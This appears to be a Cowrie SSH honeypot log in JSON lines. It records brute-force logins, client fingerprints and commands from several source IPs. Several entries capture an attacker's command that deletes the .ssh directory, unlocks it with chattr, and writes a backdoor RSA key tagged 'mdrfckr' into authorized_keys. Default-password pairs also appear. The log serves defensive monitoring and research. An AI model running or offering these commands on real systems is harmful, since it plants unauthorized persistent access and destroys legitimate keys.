{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:07:48.392429Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:07:48.667801Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:07:48.668796Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":58464,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d02584a7b58","protocol":"ssh","message":"New connection: 27.112.78.245:58464 (1.2.3.4:22) [session: 2d02584a7b58]","sensor":"my-vps","timestamp":"2025-08-26T00:07:48.938022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:07:48.939003Z","src_ip":"27.112.78.245","session":"2d02584a7b58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:07:49.207847Z","src_ip":"27.112.78.245","session":"2d02584a7b58"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:07:50.968312Z","src_ip":"27.112.78.245","session":"2d02584a7b58"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:07:52.240196Z","src_ip":"27.112.78.245","session":"2d02584a7b58"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":58472,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffa49609f246","protocol":"ssh","message":"New connection: 27.112.78.245:58472 (1.2.3.4:22) [session: ffa49609f246]","sensor":"my-vps","timestamp":"2025-08-26T00:07:52.506600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:07:52.507423Z","src_ip":"27.112.78.245","session":"ffa49609f246"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:07:53.386840Z","src_ip":"27.112.78.245","session":"ffa49609f246"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:07:54.459457Z","src_ip":"27.112.78.245","session":"ffa49609f246"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:07:54.729171Z","src_ip":"27.112.78.245","session":"ffa49609f246"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:07:54.729956Z","src_ip":"27.112.78.245","session":"163547b6edbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59048,"dst_ip":"1.2.3.4","dst_port":22,"session":"91fb17cca043","protocol":"ssh","message":"New connection: 212.227.235.229:59048 (1.2.3.4:22) [session: 91fb17cca043]","sensor":"my-vps","timestamp":"2025-08-26T00:07:59.400463Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:07:59.401651Z","src_ip":"212.227.235.229","session":"91fb17cca043"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47634,"dst_ip":"1.2.3.4","dst_port":22,"session":"859573e07230","protocol":"ssh","message":"New connection: 212.227.125.160:47634 (1.2.3.4:22) [session: 859573e07230]","sensor":"my-vps","timestamp":"2025-08-26T00:08:49.024029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:08:49.616498Z","src_ip":"212.227.125.160","session":"859573e07230"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:08:49.617473Z","src_ip":"212.227.125.160","session":"859573e07230"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:08:51.031311Z","src_ip":"212.227.125.160","session":"859573e07230"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47638,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec863af1f9bc","protocol":"ssh","message":"New connection: 212.227.125.160:47638 (1.2.3.4:22) [session: ec863af1f9bc]","sensor":"my-vps","timestamp":"2025-08-26T00:08:51.153199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:08:51.960727Z","src_ip":"212.227.125.160","session":"ec863af1f9bc"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:08:51.961756Z","src_ip":"212.227.125.160","session":"ec863af1f9bc"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:08:53.424893Z","src_ip":"212.227.125.160","session":"ec863af1f9bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47654,"dst_ip":"1.2.3.4","dst_port":22,"session":"50278e9be64b","protocol":"ssh","message":"New connection: 212.227.125.160:47654 (1.2.3.4:22) [session: 50278e9be64b]","sensor":"my-vps","timestamp":"2025-08-26T00:08:53.577013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:08:54.413652Z","src_ip":"212.227.125.160","session":"50278e9be64b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:08:54.414692Z","src_ip":"212.227.125.160","session":"50278e9be64b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:08:56.145130Z","src_ip":"212.227.125.160","session":"50278e9be64b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":36836,"dst_ip":"1.2.3.4","dst_port":22,"session":"28ac24cfa70c","protocol":"ssh","message":"New connection: 27.112.78.245:36836 (1.2.3.4:22) [session: 28ac24cfa70c]","sensor":"my-vps","timestamp":"2025-08-26T00:09:09.748583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:09:09.749739Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62808,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bca8a891b68","protocol":"ssh","message":"New connection: 217.72.205.35:62808 (1.2.3.4:22) [session: 7bca8a891b68]","sensor":"my-vps","timestamp":"2025-08-26T00:09:09.933703Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:09.934814Z","src_ip":"217.72.205.35","session":"7bca8a891b68"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:09:10.017781Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.login.success","username":"root","password":"start2022","message":"login attempt [root/start2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:09:11.130255Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:09:11.690541Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:09:11.691329Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:09:11.692873Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:11.962455Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:09:12.621470Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:09:12.622294Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:09:12.893075Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:12.894006Z","src_ip":"27.112.78.245","session":"28ac24cfa70c"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":36842,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e870f199554","protocol":"ssh","message":"New connection: 27.112.78.245:36842 (1.2.3.4:22) [session: 0e870f199554]","sensor":"my-vps","timestamp":"2025-08-26T00:09:13.160346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:09:13.161109Z","src_ip":"27.112.78.245","session":"0e870f199554"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:09:13.436368Z","src_ip":"27.112.78.245","session":"0e870f199554"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:09:14.554956Z","src_ip":"27.112.78.245","session":"0e870f199554"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:09:15.824855Z","src_ip":"27.112.78.245","session":"0e870f199554"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":38780,"dst_ip":"1.2.3.4","dst_port":22,"session":"73197adda564","protocol":"ssh","message":"New connection: 27.112.78.245:38780 (1.2.3.4:22) [session: 73197adda564]","sensor":"my-vps","timestamp":"2025-08-26T00:09:16.096345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:09:16.097250Z","src_ip":"27.112.78.245","session":"73197adda564"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:09:16.367690Z","src_ip":"27.112.78.245","session":"73197adda564"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28424,"dst_ip":"1.2.3.4","dst_port":22,"session":"73715040eb1a","protocol":"ssh","message":"New connection: 212.227.125.160:28424 (1.2.3.4:22) [session: 73715040eb1a]","sensor":"my-vps","timestamp":"2025-08-26T00:09:17.158324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:09:17.371650Z","src_ip":"212.227.125.160","session":"73715040eb1a"}
